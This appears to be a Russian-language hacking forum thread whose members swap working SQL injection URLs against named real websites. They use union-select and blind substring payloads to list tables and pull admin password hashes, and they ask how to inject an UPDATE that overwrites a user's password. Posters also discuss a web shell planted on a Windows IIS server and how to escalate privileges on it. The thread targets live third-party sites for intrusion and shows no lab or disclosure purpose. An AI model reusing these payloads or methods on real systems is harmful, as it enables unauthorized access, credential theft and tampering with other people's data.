DeluxeS в WSO нет функции изменения, тебе нужен phpmyadmin или што то подобное... ищи и качай Adminer - Compact MySQL management хорошая штука!
Я сейчас задам тупой вопрос. Залил шелл на Windows NT 5.2. Но процесс повышения прав в Windows - тёмный лес для меня. Кто может помочь - стукните в аську 3765431-четые-9
Браузер вывел следующие таблицы: www.site.com/abstract.php?abstract=-1531'+union+select+1,group_concat(0x0b,table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+--+ ADMIN, ALERT, AUTHORS, EDITORS, IPS, MYPICS, ONLINE, ORDERS, PAGES, Все таблицы в верхнем регистре. При таком запросе ничего не выводится. www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12+from+ADMIN+--+ Вводим имя таблицы в нижний регистре, все выводится. www.site.com/abstract.php?abstract=-1531'+union+select+1,count(*),3,4,5,6,7,8,9,10,11,12+from+admin+--+
А ты недумал что например, в css стоит что все слова под определённым дивом определённого размера? (Т.е. в верхнем, что в нижнем текст одинаковый).
зашел и все норм вывело Вообще, чувствительность к регистру(при указании имени базы или таблицы) у мускула зависит от платформы. В большинстве случаев, в Linux регистр играет роль, в Windows и Mac OS напротив.
Вот инфа этого сайта. Линк дать немогу, так как сайт очень интересный. 5.0.51A:REWER:REWER@LOCALHOST:SUSE-LINUX-GNU
кто подскажет как в это http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,5,6,7,8 воткнут такой запрос UPDATE `users` SET `user_pwd` = '048bc95b24facd7dc82937fa99e81389' WHERE `id` =6 LIMIT 1 ; и вообще это реально?
2POloid http://www.rsgt.com/press_releases1_more.php?id=19+and+substring(@@version,1,1)=5+-- крути как blind Code: http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),1,1)))%3E52+-- => первый символ хэша = "5" Code: http://www.rsgt.com/press_releases1_more.php?id=19+AND+ascii(lower(substring((select+user_pwd+from+users),2,1)))%3E101+-- => второй символ хэша = "f" и т.д.
Не, ну это не по пацански. Стоп, я тоже мудак дезинформатор. http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,user_pwd))),4,5,6,7,8+from+users 2 Ruller, я заметил что там блайнд, вот и начал выпендриваться. А токо ща заметил что там обыкновенная скуля. (Без твоего поста (!) )
Bb0y, Ctacok WTF?! Code: http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,aes_decrypt(aes_encrypt(user_pwd,1),1),6,7,8+from+users нет
Bb0y ты видишь функцию UPDATE, речь идет не о извлечении хеша из БД, а изменении его с помощью запроса!!
Эммм....Вывели 3-ма разными способами 1 скулю... Очень оригинально.. Завтра он задаст такой же вопрос, только уже в другом месте. Одни понты Нy просто о_Oчень интересный сайт... Продавай шелл > покупай квартиру. http://www.eje.cz/scripts/viewabstract.php?abstract=-1531'+union+select+group_concat(jmeno,0x3a,password),2,3,4,5,6,7,8,9,10,11,12+from+admin--+ => 101111 1100001 1100100 1101101 1101001 1101110 1110011 101111
Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.
Microsoft-IIS/6.0 Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.
